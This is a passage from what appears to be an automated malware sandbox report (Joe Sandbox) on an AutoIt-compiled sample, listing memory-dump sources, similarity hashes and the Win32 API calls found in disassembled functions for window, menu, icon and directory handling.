                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                                                                              • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                                              • API String ID: 4163708885-3819984048
                                                                                                                                              • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                                                                                              • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                                                                                                                                              • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                                                                                              • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: >>>AUTOIT SCRIPT<<<$\
                                                                                                                                              • API String ID: 0-1896584978
                                                                                                                                              • Opcode ID: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                                                                                                                                              • Instruction ID: daa296ce3da71eb1ea4b2d74bac6de3536c6b190185545f0361092b1072d42a3
                                                                                                                                              • Opcode Fuzzy Hash: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                                                                                                                                              • Instruction Fuzzy Hash: 4081B9B1900204ABCB20EB61CD85FDB73ED9F54304F40859EF505AB142EA39EA85CB99
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: __wcsicoll$IconLoad
                                                                                                                                              • String ID: blank$info$question$stop$warning
                                                                                                                                              • API String ID: 2485277191-404129466
                                                                                                                                              • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                                                                                                              • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                                                                                                                                              • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                                                                                                              • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                                                                                                                                              APIs
                                                                                                                                              • LoadIconW.USER32(?,00000063), ref: 0045464C
                                                                                                                                              • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                                                                                                                                              • SetWindowTextW.USER32(?,?), ref: 00454678
                                                                                                                                              • GetDlgItem.USER32(?,000003EA), ref: 00454690
                                                                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 00454697
                                                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                                                                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                                                                                                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                                                                                                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 004546F5
                                                                                                                                              • SetWindowTextW.USER32(?,?), ref: 00454765
                                                                                                                                              • GetDesktopWindow.USER32 ref: 0045476F
                                                                                                                                              • GetWindowRect.USER32(00000000), ref: 00454776
                                                                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                                                                                                                                              • GetClientRect.USER32(?,?), ref: 004547D2
                                                                                                                                              • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                                                                                                                                              • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3869813825-0
                                                                                                                                              • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                                                                                                              • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                                                                                                                                              • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                                                                                                              • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                                                                                                                                              APIs
                                                                                                                                              • _wcslen.LIBCMT ref: 00464B28
                                                                                                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                                                                                                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                                                                                                                                              • _wcslen.LIBCMT ref: 00464C28
                                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                                                                                                                                              • _wcslen.LIBCMT ref: 00464CBA
                                                                                                                                              • _wcslen.LIBCMT ref: 00464CD0
                                                                                                                                              • _wcslen.LIBCMT ref: 00464CEF
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _wcslen$Directory$CurrentSystem
                                                                                                                                              • String ID: D
                                                                                                                                              • API String ID: 1914653954-2746444292
                                                                                                                                              • Opcode ID: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                                                                                                                                              • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                                                                                                                                              • Opcode Fuzzy Hash: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                                                                                                                                              • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                                                                                                                                              APIs
                                                                                                                                              • _wcsncpy.LIBCMT ref: 0045CE39
                                                                                                                                              • __wsplitpath.LIBCMT ref: 0045CE78
                                                                                                                                              • _wcscat.LIBCMT ref: 0045CE8B
                                                                                                                                              • _wcscat.LIBCMT ref: 0045CE9E
                                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEB2
                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEC5
                                                                                                                                                • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                                                                              • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF05
                                                                                                                                              • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF1D
                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF2E
                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF3F
                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF53
                                                                                                                                              • _wcscpy.LIBCMT ref: 0045CF61
                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CFA4
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                                                                                                                                              • String ID: *.*
                                                                                                                                              • API String ID: 1153243558-438819550
                                                                                                                                              • Opcode ID: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                                                                                                              • Instruction ID: eacc2f87ca0c49a88fd160cf35c0ab61f7b8ac52d7ffc0430f804bda47b2a69a
                                                                                                                                              • Opcode Fuzzy Hash: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                                                                                                              • Instruction Fuzzy Hash: F071D572900208AEDB24DB54CCC5AEEB7B5AB44305F1489ABE805D7242D67C9ECDCB99
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: __wcsicoll
                                                                                                                                              • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                                                                                                                              • API String ID: 3832890014-4202584635
                                                                                                                                              • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                                                                                                              • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                                                                                                                                              • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                                                                                                              • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                                                                                                                                              APIs
                                                                                                                                              • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                                                                                                                                              • GetFocus.USER32 ref: 0046A0DD
                                                                                                                                              • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                                                                                                                                              • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessagePost$CtrlFocus
                                                                                                                                              • String ID: 0
                                                                                                                                              • API String ID: 1534620443-4108050209
                                                                                                                                              • Opcode ID: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                                                                                                                                              • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                                                                                                                                              • Opcode Fuzzy Hash: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                                                                                                                                              • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                                                                                                                                              APIs
                                                                                                                                              • DestroyWindow.USER32(?), ref: 004558E3
                                                                                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window$CreateDestroy
                                                                                                                                              • String ID: ,$tooltips_class32
                                                                                                                                              • API String ID: 1109047481-3856767331
                                                                                                                                              • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                                                                                              • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                                                                                                                                              • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                                                                                              • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                                                                                                                                              APIs
                                                                                                                                              • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                                                                                                                                              • GetMenuItemCount.USER32(?), ref: 00468C45
                                                                                                                                              • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                                                                                                                                              • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                                                                                                                                              • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                                                                                                                                              • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                                                                                                                                              • GetMenuItemCount.USER32 ref: 00468CFD
                                                                                                                                              • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                                                                                                                                              • GetCursorPos.USER32(?), ref: 00468D3F
                                                                                                                                              • SetForegroundWindow.USER32(?), ref: 00468D49
                                                                                                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                                                                                                                                              • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                                                                                                                                              • String ID: 0
                                                                                                                                              • API String ID: 1441871840-4108050209
                                                                                                                                              • Opcode ID: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                                                                                                                              • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                                                                                                                                              • Opcode Fuzzy Hash: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                                                                                                                              • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                                                                                                              • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                                                                                                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                                                                                                              • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                                                                                                              • __swprintf.LIBCMT ref: 00460915
                                                                                                                                              • __swprintf.LIBCMT ref: 0046092D
                                                                                                                                              • _wprintf.LIBCMT ref: 004609E1
                                                                                                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                                                                                                                                              • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                              • API String ID: 3631882475-2268648507
                                                                                                                                              • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                                                                                                              • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                                                                                                                                              • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                                                                                                              • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                                                                                                                                              APIs
                                                                                                                                              • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                                                                                                                                              • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                                                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                                                                                                                                              • SendMessageW.USER32 ref: 00471740
                                                                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                                                                                                                                              • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                                                                                                                                              • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                                                                                                                                              • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                                                                                                                                              • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                                                                                                                                              • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                                                                                                                                              • SendMessageW.USER32 ref: 0047184F
                                                                                                                                              • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                                                                                                                                              • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                                                                                                                                              • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
                                                                                                                                              • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
